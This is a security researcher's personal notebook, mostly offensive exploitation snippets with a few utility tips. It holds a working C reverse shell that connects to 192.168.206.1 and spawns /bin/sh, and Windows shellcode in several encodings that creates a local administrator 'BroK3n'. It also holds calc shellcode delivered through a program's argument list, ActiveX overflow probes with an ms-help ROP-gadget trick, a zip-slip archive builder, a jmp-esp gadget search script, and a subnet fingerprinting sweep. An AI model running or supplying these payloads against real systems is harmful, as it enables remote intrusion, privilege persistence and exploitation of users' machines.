一点学习笔记

by Netfairy - 2016-12-11

【apt-get install安装软件问题(安装包的依赖库版本过高问题)】

# List the candidate versions of the package (and the dependency constraints each one carries).
apt-cache showpkg libqt4-dbus
# Pin an explicit, older version when the default candidate pulls in dependencies that are too new.
aptitude install libqt4-dbus=4.4.3-1


【反连shell】

#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>

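int soc,rc;
struct sockaddr_in serv_addr;


/* Reverse shell: connect back to 192.168.206.1:30583 and hand the socket to /bin/sh as
 * stdin/stdout/stderr. Address and port are written as raw little-endian dwords that
 * already hold the network byte order, so no htons()/inet_addr() is used (inet_addr()
 * would need <arpa/inet.h>). Returns 1 if the socket cannot be created or connected, or
 * if execve() fails; on success execve() never returns. */
int main()
{
	/* execve() expects argv[0] to name the program; passing a NULL argv is not portable. */
	char *const argv[] = { "/bin/sh", NULL };

	serv_addr.sin_family=AF_INET;
	serv_addr.sin_addr.s_addr=0x01cea8c0;  /* bytes c0 a8 ce 01 in memory = 192.168.206.1 */
	serv_addr.sin_port=0x7777;  /* 30583; the value is byte-order symmetric */
	soc=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
	if (soc < 0)
	{
		return 1;
	}
	/* sizeof() instead of the magic 0x10 so the length always matches the struct. */
	rc=connect(soc,(struct sockaddr*)&serv_addr,sizeof(serv_addr));
	if (rc < 0)
	{
		/* Do not spawn a shell whose std fds point at a dead socket. */
		close(soc);
		return 1;
	}
	dup2(soc,0);
	dup2(soc,1);
	dup2(soc,2);
	execve("/bin/sh",argv,0);
	return 1;  /* only reached when execve() failed */
}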



【克隆指定版本仓库】

# -b <name> accepts a tag as well as a branch: this clones binwalk and checks out the v2.0.0 tag.
git clone -b v2.0.0 https://github.com/devttys0/binwalk.git


【添加用户 shellcode（Win7/XP 可用，194 字节）—— 通过 WinExec 执行 cmd.exe /c net user BroK3n BroK3n /ADD && net localgroup Administrators BroK3n /ADD，即新建本地管理员账户 BroK3n（密码 BroK3n）】

/* Windows x86 shellcode (XP/Win7). Walks the PEB loader list until it finds a module whose
 * name has '3' at byte offset 0xc (KERNEL32.DLL), scans that module's export names for
 * "WinE" to resolve WinExec, then pushes and runs, with uCmdShow = 0:
 *   cmd.exe /c net user BroK3n BroK3n /ADD && net localgroup Administrators BroK3n /ADD
 * i.e. it creates a local administrator "BroK3n" with password "BroK3n" -- a hard-coded
 * credential and an easy indicator for defenders. The command is pushed with a trailing
 * 0x01 that 'dec byte ptr [ebp+0x53]' turns into the NUL terminator, keeping the payload
 * itself free of NUL bytes. */
unsigned char shellcode[]="\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x57\x69\x6e\x45\x75\xf2\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x4b\x33\x6e\x01\x68\x20\x42\x72\x6f\x68\x2f\x41\x44\x44\x68\x6f\x72\x73\x20\x68\x74\x72\x61\x74\x68\x69\x6e\x69\x73\x68\x20\x41\x64\x6d\x68\x72\x6f\x75\x70\x68\x63\x61\x6c\x67\x68\x74\x20\x6c\x6f\x68\x26\x20\x6e\x65\x68\x44\x44\x20\x26\x68\x6e\x20\x2f\x41\x68\x72\x6f\x4b\x33\x68\x33\x6e\x20\x42\x68\x42\x72\x6f\x4b\x68\x73\x65\x72\x20\x68\x65\x74\x20\x75\x68\x2f\x63\x20\x6e\x68\x65\x78\x65\x20\x68\x63\x6d\x64\x2e\x89\xe5\xfe\x4d\x53\x31\xc0\x50\x55\xff\xd7";

// Same payload as the C array above, %u-escaped (two bytes per unit, little-endian) for use
// from JavaScript via unescape(): creates local administrator BroK3n/BroK3n through WinExec.
shellcode = unescape("%ud231%u30b2%u8b64%u8b12%u0c52%u528b%u8b1c%u0842%u728b%u8b20%u8012%u0c7e%u7533%u89f2%u03c7%u3c78%u578b%u0178%u8bc2%u207a%uc701%ued31%u348b%u01af%u45c6%u3e81%u6957%u456e%uf275%u7a8b%u0124%u66c7%u2c8b%u8b6f%u1c7a%uc701%u7c8b%ufcaf%uc701%u4b68%u6e33%u6801%u4220%u6f72%u2f68%u4441%u6844%u726f%u2073%u7468%u6172%u6874%u6e69%u7369%u2068%u6441%u686d%u6f72%u7075%u6368%u6c61%u6867%u2074%u6f6c%u2668%u6e20%u6865%u4444%u2620%u6e68%u2f20%u6841%u6f72%u334b%u3368%u206e%u6842%u7242%u4b6f%u7368%u7265%u6820%u7465%u7520%u2f68%u2063%u686e%u7865%u2065%u6368%u646d%u892e%ufee5%u534d%uc031%u5550%ud7ff");

31D2B230648B128B520C8B521C8B42088B72208B12807E0C3375F289C703783C8B577801C28B7A2001C731ED8B34AF01C645813E57696E4575F28B7A2401C7668B2C6F8B7A1C01C78B7CAFFC01C7684B336E01682042726F682F414444686F727320687472617468696E6973682041646D68726F75706863616C676874206C6F6826206E656844442026686E202F4168726F4B3368336E20426842726F4B68736572206865742075682F63206E686578652068636D642E89E5FE4D5331C05055FFD7
【弹计算器XP WIN7可用】


/* Windows x86 shellcode (XP/Win7) that pops calc. Locates kernel32 through the PEB loader
 * list and resolves exports by a ROR-4 hash of the name ('ror edx,4' per character).
 * First hash (0x69ccc4e7) is called with a pointer to "calc" and 1 as the second argument,
 * consistent with WinExec("calc", SW_SHOWNORMAL); the second hash (0x2a60a677) is then
 * called with 0, which looks like ExitProcess(0) so the host exits cleanly. The hash
 * values have not been re-verified here. A 0 dword is pushed before "calc" so the string
 * is NUL-terminated on the stack. */
unsigned char shellcode[]="\xeb\x54\x31\xf6\x64\x8b\x76\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x6e\x08\x8b\x36\x8b\x5d\x3c\x8b\x5c\x1d\x78\x85\xdb\x74\xf0\x01\xeb\x8b\x4b\x18\x67\xe3\xe8\x8b\x7b\x20\x01\xef\x8b\x7c\x8f\xfc\x01\xef\x31\xc0\x99\x02\x17\xc1\xca\x04\xae\x75\xf8\x3b\x54\x24\x04\xe0\xe4\x75\xca\x8b\x53\x24\x01\xea\x0f\xb7\x14\x4a\x8b\x7b\x1c\x01\xef\x03\x2c\x97\xc3\x68\xe7\xc4\xcc\x69\xe8\xa2\xff\xff\xff\x50\x68\x63\x61\x6c\x63\x8b\xd4\x40\x50\x52\xff\xd5\x68\x77\xa6\x60\x2a\xe8\x8b\xff\xff\xff\x50\xff\xd5";

// Same calc payload as the C array above, %u-escaped for unescape() (two bytes per unit, little-endian).
shellcode = unescape("%u54eb%uf631%u8b64%u3076%u768b%u8b0c%u1c76%u6e8b%u8b08%u8b36%u3c5d%u5c8b%u781d%udb85%uf074%ueb01%u4b8b%u6718%ue8e3%u7b8b%u0120%u8bef%u8f7c%u01fc%u31ef%u99c0%u1702%ucac1%uae04%uf875%u543b%u0424%ue4e0%uca75%u538b%u0124%u0fea%u14b7%u8b4a%u1c7b%uef01%u2c03%uc397%ue768%uccc4%ue869%uffa2%uffff%u6850%u6163%u636c%ud48b%u5040%uff52%u68d5%ua677%u2a60%u8be8%uffff%u50ff%ud5ff");

EB5431F6648B76308B760C8B761C8B6E088B368B5D3C8B5C1D7885DB74F001EB8B4B1867E3E88B7B2001EF8B7C8FFC01EF31C0990217C1CA04AE75F83B542404E0E475CA8B532401EA0FB7144A8B7B1C01EF032C97C368E7C4CC69E8A2FFFFFF506863616C638BD4405052FFD56877A6602AE88BFFFFFF50FFD5

【JS 判断 ActiveX 控件和 Office 版本】


<html>
<body>

<object classid='clsid:8C4D012A-9B6C-4B87-A7CB-724BD7A9727C' id='target0' ></object>
<object classid='clsid:2CD1D011-1DC4-4EBC-B03E-67E3713DF5A3' id='target1' ></object>

<script >

    // Probe 1: the control with CLSID 8C4D012A-... (the ebz_Printmade2 installer's control,
    // per the alert text). If the method exists the call succeeds and the control is present;
    // a missing control makes the call throw. arg0 is 2^64 + 11 -- a value that overflows a
    // 64-bit integer -- so this presumably also exercises the control's numeric parsing.
    try
    {
        arg0="18446744073709551627"
        arg1="AAAAAAAAAAAA"
        target0.writeFileWithName(arg0,arg1);
        alert("ebz_Printmade2_setup.exe install!") ; 
    }
    catch(e)
    {
        alert("ebz_Printmade2_setup.exe no install!") ; 
    }

    // Probe 2: the control with CLSID 2CD1D011-... (iBankSetup's control, per the alert text).
    // arg2 is 2^63 + 10, i.e. just past the signed 64-bit range.
    try
    {
        arg0="AAAAA";
        arg1="IMC4";
        arg2="9223372036854775818";
        target1.convertTextToImage(arg0 ,arg1 ,arg2) ;
        alert("iBankSetup install!") ; 
    }
    catch(e)
    {
        alert("iBankSetup no install!") ; 
    }

    // Office version detection: try to instantiate two versions of the SharePoint.OpenDocuments
    // ActiveX class. A successful `new` leaves an object; a failure leaves the numeric 0.
    var checka = 0;
    var checkb = 0;
     try
    {
        checka = new ActiveXObject("SharePoint.OpenDocuments.4");
    } 
    catch (e) {}
                 
     try 
    {
        checkb = new ActiveXObject("SharePoint.OpenDocuments.3");
    }
    catch (e) {}

                 
    // Both .4 and .3 present is reported as Office 2010; only .3 as Office 2007.
    // In both cases the page then navigates to ms-help://, which loads the Help protocol
    // handler; together with the "Office2010 hxds rop" note further down this looks like the
    // trick of pulling hxds.dll into the process for ROP gadgets -- verify against the zip.
    if ((typeof checka) == "object" && (typeof checkb) == "object") 
    {
        alert("Microsoft Office 2010");
        try
        {
            location.href='ms-help://'
        } 
        catch(e){}              
    }
    else if ((typeof checka) == "number" && (typeof checkb) == "object") 
    {
        alert("Microsoft Office 2007");
        try
        {
            location.href='ms-help://'
        } 
        catch(e){}    
    }
    else
    {
        alert("No support version!");
    }

  
  
</script></body></html>



【Fuzzing驱动的时候输出到内核调试器】

1.驱动
#include <ntddk.h>

PDEVICE_OBJECT pDevice_Object;  // device object created in DriverEntry, deleted in DriverUnload
UNICODE_STRING devname;  // device name, \Device\Netfairy
UNICODE_STRING symname;  // symbolic link name, \DosDevices\Netfairy
#define FILE_DEVICE_EXPLOIT_ME 0x00008888

// Private IOCTL: device type 0x8888, function 0x800, METHOD_NEITHER, FILE_WRITE_ACCESS.
// CTL_CODE expands this to 0x8888a003 (the value the user-mode fuzzer passes), not 0x888a003.
// METHOD_NEITHER means the I/O manager neither probes nor copies the input buffer:
// Type3InputBuffer is a raw user-mode pointer that the handler must validate itself.
#define IOCTL_1 (ULONG)CTL_CODE(FILE_DEVICE_EXPLOIT_ME,0x800,METHOD_NEITHER,FILE_WRITE_ACCESS)  //0x8888a003



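// Unload routine: tear down in reverse order of creation -- the symbolic link first so user
// mode can no longer reach the device, then the device object itself. The parameter is the
// DRIVER object (it was misleadingly named pDeviceObject before); the device lives in the
// global pDevice_Object.
void DriverUnload(PDRIVER_OBJECT pDriverObject)
{
	UNREFERENCED_PARAMETER(pDriverObject);
	IoDeleteSymbolicLink(&symname);
	IoDeleteDevice(pDevice_Object);
	// Reported after the cleanup so the message is true when it appears in the debugger.
	KdPrint(("驱动卸载成功\n"));
}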


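// Complete an IRP at once with STATUS_SUCCESS and zero bytes transferred. Shared by the
// IRP_MJ_CREATE/CLOSE/READ/WRITE dispatch routines, none of which keeps per-request state.
// The IRP must not be touched after IoCompleteRequest() returns (it may already be freed),
// which is why the status is returned as a constant rather than re-read from the IRP.
static NTSTATUS CompleteRequestSuccess(PIRP pIrp)
{
	pIrp->IoStatus.Status=STATUS_SUCCESS;
	pIrp->IoStatus.Information=0;
	IoCompleteRequest(pIrp,IO_NO_INCREMENT);
	return STATUS_SUCCESS;
}

//IRP_MJ_CREATE handler: every open succeeds; nothing is allocated per handle.
NTSTATUS CreateHandler(PDEVICE_OBJECT pDeviceObject,PIRP pIrp)
{
	UNREFERENCED_PARAMETER(pDeviceObject);
	return CompleteRequestSuccess(pIrp);
}

//IRP_MJ_CLOSE handler: nothing to release.
NTSTATUS CloseHandler(PDEVICE_OBJECT pDeviceObject,PIRP pIrp)
{
	UNREFERENCED_PARAMETER(pDeviceObject);
	return CompleteRequestSuccess(pIrp);
}

//IRP_MJ_READ handler: always returns 0 bytes (Information = 0), i.e. reads see end-of-file.
NTSTATUS ReadHandler(PDEVICE_OBJECT pDeviceObject,PIRP pIrp)
{
	UNREFERENCED_PARAMETER(pDeviceObject);
	return CompleteRequestSuccess(pIrp);
}

//IRP_MJ_WRITE handler: accepts the request and reports 0 bytes written; data is not used.
NTSTATUS WriteHandler(PDEVICE_OBJECT pDeviceObject,PIRP pIrp)
{
	UNREFERENCED_PARAMETER(pDeviceObject);
	return CompleteRequestSuccess(pIrp);
}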


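//IRP_MJ_DEVICE_CONTROL handler. IOCTL_1 echoes the caller's input buffer to the kernel
//debugger so that, when a fuzzing run crashes the target driver, the last payload sent is
//the last line in the debugger output. Unknown codes are rejected with
//STATUS_INVALID_DEVICE_REQUEST instead of silently succeeding.
NTSTATUS ControlHandler(PDEVICE_OBJECT pDeviceObject,PIRP pIrp)
{
	PIO_STACK_LOCATION pIrpStackLocation;
	ULONG ioControlCode;
	ULONG inputLength;
	PVOID userBuffer;
	ULONG copyLength;
	CHAR echo[256];  // bounded kernel-side copy: user data may be unterminated and arbitrarily long
	NTSTATUS status=STATUS_SUCCESS;

	UNREFERENCED_PARAMETER(pDeviceObject);

	pIrpStackLocation=IoGetCurrentIrpStackLocation(pIrp);
	ioControlCode=pIrpStackLocation->Parameters.DeviceIoControl.IoControlCode;
	inputLength=pIrpStackLocation->Parameters.DeviceIoControl.InputBufferLength;
	userBuffer=pIrpStackLocation->Parameters.DeviceIoControl.Type3InputBuffer;

	switch(ioControlCode)
	{
	case IOCTL_1:
		// METHOD_NEITHER: Type3InputBuffer is a raw user-mode pointer the I/O manager has
		// neither probed nor copied. Passing it straight to DbgPrint("%s") lets any caller
		// crash the kernel with a bad pointer, or make the kernel read past the end of the
		// buffer looking for a NUL. Probe it, copy a bounded amount under SEH, terminate.
		if(userBuffer==NULL || inputLength==0)
		{
			status=STATUS_INVALID_PARAMETER;
			break;
		}
		copyLength=(inputLength<(ULONG)(sizeof(echo)-1))?inputLength:(ULONG)(sizeof(echo)-1);
		__try
		{
			if(pIrp->RequestorMode!=KernelMode)
			{
				ProbeForRead(userBuffer,inputLength,sizeof(UCHAR));
			}
			RtlCopyMemory(echo,userBuffer,copyLength);
		}
		__except(EXCEPTION_EXECUTE_HANDLER)
		{
			status=GetExceptionCode();
		}
		if(NT_SUCCESS(status))
		{
			echo[copyLength]='\0';  // user data is not guaranteed to be NUL-terminated
			DbgPrint("%s\n\n",echo);
		}
		break;
	default:
		DbgPrint("ERROR!");
		status=STATUS_INVALID_DEVICE_REQUEST;
	}

	pIrp->IoStatus.Status=status;
	pIrp->IoStatus.Information=0;
	IoCompleteRequest(pIrp,IO_NO_INCREMENT);

	return status;
}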

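// Driver entry: install the dispatch table, create \Device\Netfairy and expose it as
// \DosDevices\Netfairy. The dispatch routines are registered before the device and its
// symbolic link exist, so user mode can never open the device while the table still holds
// the I/O manager defaults. Returns the failing status if device or link creation fails,
// undoing the device creation in the latter case.
NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject,PUNICODE_STRING pUnicodeString)
{
	NTSTATUS status;

	UNREFERENCED_PARAMETER(pUnicodeString);  // the registry path is not used

	pDriverObject->DriverUnload=DriverUnload;
	pDriverObject->MajorFunction[IRP_MJ_CREATE]=CreateHandler;
	pDriverObject->MajorFunction[IRP_MJ_CLOSE]=CloseHandler;
	pDriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL]=ControlHandler;
	pDriverObject->MajorFunction[IRP_MJ_READ]=ReadHandler;
	pDriverObject->MajorFunction[IRP_MJ_WRITE]=WriteHandler;

	RtlInitUnicodeString(&devname,L"\\Device\\Netfairy");
	RtlInitUnicodeString(&symname,L"\\DosDevices\\Netfairy");
	// No device extension, FILE_DEVICE_UNKNOWN, Exclusive=TRUE (one open handle at a time).
	// TRUE rather than the C++ 'true' so this also builds as plain C.
	status=IoCreateDevice(pDriverObject,0,&devname,FILE_DEVICE_UNKNOWN,0,TRUE,&pDevice_Object);
	if(!NT_SUCCESS(status))
	{
		DbgPrint("创建设备失败\n");
		return status;
	}
	DbgPrint("创建设备成功\n");

	status=IoCreateSymbolicLink(&symname,&devname);
	if(!NT_SUCCESS(status))
	{
		DbgPrint("创建符号失败\n");
		IoDeleteDevice(pDevice_Object);
		return status;
	}
	DbgPrint("创建符号成功\n");

	return STATUS_SUCCESS;
}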

2.Fuzzing模块

#include<stdio.h>
#include<windows.h>
#include<time.h>

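//Return a freshly malloc()ed, NUL-terminated string of (length - 1) random alphanumeric
//characters, about one third each upper-case, lower-case and digits. The caller owns the
//buffer and must free() it. length < 1 yields an empty string instead of writing before the
//start of a zero-byte allocation; NULL is returned only when malloc() fails.
//The generator is deliberately NOT reseeded here: main() seeds once, and reseeding with
//time(NULL) on every call made all calls within the same second return the same string.
char* genRandomString(int length)
{
    char* buf;
    int i;

    if (length < 1)
    {
        length = 1;
    }
    buf = (char*) malloc((size_t) length);
    if (buf == NULL)
    {
        return NULL;
    }

    for (i = 0; i < length - 1; i++)
    {
        switch (rand() % 3)
        {
            case 0:
                buf[i] = 'A' + rand() % 26;
                break;
            case 1:
                buf[i] = 'a' + rand() % 26;
                break;
            default:
                buf[i] = '0' + rand() % 10;
                break;
        }
    }
    buf[length - 1] = '\0';
    return buf;
}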

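//Fuzz loop: send random alphanumeric strings of random length (1..999 bytes including the
//terminator) to the target device, mirroring each one to the helper driver first so the
//payload that caused a crash is the last line in the kernel debugger output.
int main()
{
	BOOL ret;
	DWORD retn;
	char* payload;
	unsigned int Length=0;

	srand((unsigned)time(NULL));  // seed once; genRandomString() relies on this

	// Target under test (\\.\bd0004, IOCTL 0x222000 -- presumably the driver being fuzzed)
	// and the helper driver defined above (\\.\Netfairy, IOCTL_1 == 0x8888a003).
	HANDLE device=CreateFile("\\\\.\\bd0004",GENERIC_READ | GENERIC_WRITE,0,0,OPEN_EXISTING,FILE_ATTRIBUTE_SYSTEM,0);  
	HANDLE debug=CreateFile("\\\\.\\Netfairy",GENERIC_READ | GENERIC_WRITE,0,0,OPEN_EXISTING,FILE_ATTRIBUTE_SYSTEM,0);  

	if(device==INVALID_HANDLE_VALUE)
	{
		printf("打开设备失败\n");
		getchar();
		exit(1);
	}
	if(debug==INVALID_HANDLE_VALUE)
	{
		// Without the debug channel a crash cannot be tied to its input, so stop here
		// instead of passing an invalid handle to DeviceIoControl on every iteration.
		printf("打开设备失败\n");
		CloseHandle(device);
		getchar();
		exit(1);
	}

	while(1)
	{
		Length=rand()%1000;
		if(Length==0)
		{
			// genRandomString(0) has no room for its terminator (it wrote to index -1);
			// a zero-length payload is skipped rather than risk that.
			continue;
		}
		payload=genRandomString(Length);
		if(payload==NULL)
		{
			printf("malloc failed\n");
			break;
		}
		// Echo to the kernel debugger first, then hit the target with the same buffer
		// (Length bytes, including the NUL written by genRandomString()).
		DeviceIoControl(debug,0x8888a003,payload,Length,NULL,0,&retn,NULL);  
		ret=DeviceIoControl(device,0x222000,payload,Length,NULL,0,&retn,NULL); 
		if(!ret)
		{
			printf("send failed\n");
			printf("GetLastError=%lu\n",GetLastError());  // the NTSTATUS-derived reason matters when triaging
		}
		else
		{
			printf("send success\n");
		}
		free(payload);  // previously leaked on every iteration of an endless loop
	}

	CloseHandle(debug);
	CloseHandle(device);
	getchar();
	return 0;
}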

【Office2010 hxds rop】

rop.zip

【XP msvcrt mshtml rop】

msvcrt.zip

mshtml.zip


【1.html 加载 2.html】

//1.html
<html>
<body>
<script type="text/javascript">
	// Opens 2.html twice (two separate window.open calls, differing only in quote style).
	window.open("2.html");
	window.open('2.html');
</script>
</body>
</html>

//2.html
<html>
<head ></head>
<script>		
		window.opener=null;window.open('','_self');window.close();  // close this window without the "close this window?" prompt: clearing opener and re-targeting _self makes IE treat it as script-opened
</script>
<body></body>
</html>

【windbg布置】


所有这些workspace的信息都被保存在注册表中,注册表的路径是

HKEY_CURRENT_USER\Software\Microsoft\Windbg\Workspaces

style.zip


【解决“在此页上的 ActiveX 控件和本页上的其他部分的交互可能不安全。你想允许这种交互吗？”提示】

解决在此页上的activex控件和本页上的其他部分的交互可能不安全.你想允许这种交互吗.zip


【结束进程并替换文件】

//By Netfairy
#include "stdafx.h"
#include <windows.h> 

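// Kill the running CAJSHost.exe and overwrite the installed copy with C:\CAJSHost.exe.
// Both steps shell out via system(). The copy's exit code is now checked, so a failed
// replacement (e.g. access denied under Program Files without elevation) is reported as
// a non-zero exit status instead of always returning 0. Note that replacing a trusted
// program's executable under Program Files is exactly the pattern used to hijack it;
// keep the source binary under control.
int main(int argc, char *argv[]) 
{ 
	int rc;
	(void)argc;
	(void)argv;

	// taskkill fails when the process is not running; that must not stop the copy.
	(void)system("taskkill /f /im CAJSHost.exe");
	rc=system("xcopy C:\\CAJSHost.exe \"C:\\Program Files\\TTKN\\CAJVD\"  /Y");

	return rc==0 ? 0 : 1; 
}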

【创建一个非法压缩包】


import zipfile, sys

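def create_evil_zip(out_path="evil.zip", src="test.txt",
                    arcname="..\\..\\..\\..\\..\\..\\..\\..\\POC.txt"):
    """Write *src* into *out_path* under the traversal entry name *arcname*.

    Zip-slip PoC: an extractor that joins entry names onto its output
    directory without rejecting ``..`` components writes POC.txt eight
    levels above the extraction directory. zipfile only rewrites
    ``os.sep`` when storing names, so on POSIX the backslashes are kept
    literally and the entry is a traversal only for extractors that treat
    ``\\`` as a separator; build on Windows (or use ``/``) for a portable
    sample.

    Returns *out_path*. Raises OSError/IOError if *src* does not exist.
    """
    # `with` closes the archive (and writes its central directory) even if
    # write() raises; the original left it open on error.
    with zipfile.ZipFile(out_path, "w") as zf:
        zf.write(src, arcname)
    print("[+] Created %s successfully [+]" % out_path)
    return out_path


if __name__ == "__main__":
    create_evil_zip()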


【调用控制台程序并传递参数】

import struct,os,subprocess

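# Windows x86 payload delivered through argv. Locates kernel32 via the PEB, resolves an
# export by a 16-bit ROR-1 hash of its name (cmp dx, 0xf510), pushes "calc.exe" and calls
# it -- WinExec in all likelihood -- then hits int3 (\xCC) so a debugger attached to the
# target catches the moment right after the call. It contains no NUL byte, which argv
# delivery requires.
shellcode=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")

# Console program whose argument handling is under test.
vulnpgm="C:\\Users\\Netfairy\\Desktop\\tcping.exe"


def launch(program, payload):
    """Start *program* with *payload* as its single command-line argument.

    shell=False so the payload reaches CreateProcess verbatim instead of
    being parsed by cmd.exe. Written for Python 2, where str is bytes; on
    Python 3 a str payload is Unicode and its code points >= 0x80 are
    re-encoded on the way to the target, so it would no longer arrive
    byte-for-byte.

    Returns the subprocess.Popen handle so the caller can wait() for the
    exit status (a crash shows up as an abnormal return code).
    Raises OSError if *program* cannot be started.
    """
    return subprocess.Popen([program, payload], shell=False)


if __name__ == "__main__":
    launch(vulnpgm, shellcode)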

【搜索一些符合条件指令地址】


$$ Gadget search. Outer loop: byte-step 0x39d01000..0x39f03000 looking for a 16-bit word of
$$ 0xe4ff (bytes FF E4 = jmp esp) or 0xc354 (bytes 54 C3 = push esp; ret).
$$ Inner loop: for each gadget, byte-step 0x3a080000..0x3a0a5000 for a spot where the dword
$$ at +0x10 is 0 and the dword at +0x4 equals (dword at the gadget address) - 0x24; print both
$$ addresses. .break only leaves the inner loop, so every gadget is reported at most once.
$$ Stepping one byte at a time in .while is slow; 's -w <range> e4ff c354' would find the
$$ gadget candidates in one pass and only the inner scan would need scripting.
r @$t0 = 0x39d01000
r @$t1 = 0x3a080000


.while( @$t0<0x39f03000)
{
	.if (wo(@$t0) == 0xe4ff or wo(@$t0) == 0xc354 ) 
	{
		$$ restart the inner scan for every gadget hit
		r @$t1 = 0x3a080000
		.while( @$t1<0x3a0a5000 )
		{
			.if ((poi(@$t1+0x10)) == 0x0 ) 
			{
				.if ( poi(@$t1+0x4) == (poi(@$t0) -0x24) )  
				{
					.printf "%x\n",@$t0;
					.printf "%x\n",@$t1;
					
					.break
				}
			}
			r @$t1=@$t1+1;
		}
	}
	r @$t0=@$t0+1;
}


【IDA修复符号表】


#coding:utf-8
from idaapi import *
import time

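loadaddress = 0x10000  # firmware load address (image base in the IDB)
eaStart = 0x301e64 + loadaddress  # first symbol-table entry
eaEnd = 0x3293a4 + loadaddress  # end of the symbol table (exclusive)


def fix_symbol_table(ea_start, ea_end, entry_size=16):
    """Name and define functions from a firmware symbol table.

    Each *entry_size*-byte entry begins with a pointer to a C string (the
    function name) followed by a pointer to the function; the remaining
    bytes are not used here. For every entry the string is defined, the
    target is renamed, marked as code and turned into a function.

    Returns the number of entries that yielded a name. Relies on IDA's
    script namespace (MakeStr, Dword, GetString, MakeName, MakeCode,
    MakeFunction, BADADDR, ASCSTR_C) being available, as the original did.
    """
    named = 0
    for ea in range(ea_start, ea_end, entry_size):
        name_ptr = Dword(ea)
        # A zero/BADADDR name pointer marks an unusable entry; skip it rather
        # than define a string at address 0.
        if name_ptr in (0, BADADDR):
            continue
        MakeStr(name_ptr, BADADDR)
        name = GetString(name_ptr, -1, ASCSTR_C)
        print(name)
        if not name:
            continue
        func_ea = Dword(ea + 4)
        # MakeName returns 0 when the name cannot be applied (e.g. already
        # used elsewhere); report it so collisions are visible in the log.
        if not MakeName(func_ea, name):
            print("MakeName failed at 0x%x for %s" % (func_ea, name))
        MakeCode(func_ea)
        MakeFunction(func_ea, BADADDR)
        named += 1
    return named


if __name__ == "__main__":
    fix_symbol_table(eaStart, eaEnd)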

【指纹识别】


import httplib  
import re
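def scan_subnet(prefix="192.168.29.", pattern=r"SANGFOR AF", port=80,
                timeout=0.2, hosts=None):
    """Sweep prefix+host for HTTP servers whose front page matches *pattern*.

    Fingerprints a SANGFOR AF gateway by the text of its default page. Each
    host (0..255 unless *hosts* is given) gets one ``GET /`` with a short
    timeout; hosts that refuse, time out or answer garbage are skipped.
    Matching addresses are printed as they are found and returned as a list.

    Only Exception is swallowed -- the bare ``except:`` of the original also
    ate KeyboardInterrupt, so the sweep could not be stopped with Ctrl-C.
    Works on Python 2 (httplib) and 3 (http.client).
    """
    try:
        import httplib  # Python 2
    except ImportError:
        import http.client as httplib  # Python 3
    if hosts is None:
        hosts = range(256)
    matcher = re.compile(pattern)
    found = []
    for i in hosts:
        host = prefix + str(i)
        conn = None
        try:
            conn = httplib.HTTPConnection(host, port, timeout=timeout)
            conn.request("GET", "/")
            body = conn.getresponse().read()
        except Exception:
            continue
        finally:
            # Always release the socket; the original leaked it on any error.
            if conn is not None:
                conn.close()
        # read() returns bytes on Python 3; latin-1 decodes any byte sequence.
        if matcher.search(body.decode("latin-1", "replace")):
            print(host)
            found.append(host)
    return found


if __name__ == "__main__":
    scan_subnet()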